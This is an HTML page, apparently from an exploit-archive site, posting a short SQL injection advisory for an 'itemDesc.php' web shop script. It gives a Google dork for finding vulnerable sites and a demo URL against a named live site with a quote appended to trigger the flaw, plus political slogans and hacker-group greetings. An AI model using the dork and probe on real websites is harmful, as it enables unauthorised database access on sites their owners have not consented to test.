<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-6</title>
    </head>
    <body>
        <center>
                <a  href="exploit-6" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
# Exploit Title :   


 Web Design itemDesc.php site sql injection


# Exploit Author : Guardiran Security Team 


# Vendor Homepage http://mpaying.com

# Google Dork : itemDesc.php?CartId=

my team: Guardiran Security Team 

http://guardiran.org/profile/25294-rednofozi/

# category : webapps

# Tested on : Win8 , Kali Linux

me:rednofozi@yahoo.com


Proof of Concept :


search google Dork : itemDesc.php?CartId=

Demo : http://mpaying.com/checkout1.php?id=237' (sql-injection



# Discovered by : Rednofozi
 
 Long live SistanAs long as I live in my body, I defend this soilLong live Seyyed Ali Khamenei

guard iran hackers


tnx to :REX , DeMoN, C0d3!Nj3ct!0n ,Mr.Python , virtual_hate Comrade،, JOK3R ,  Ruiner , mr_null -  1TED
        </pre>
    </body>
</html>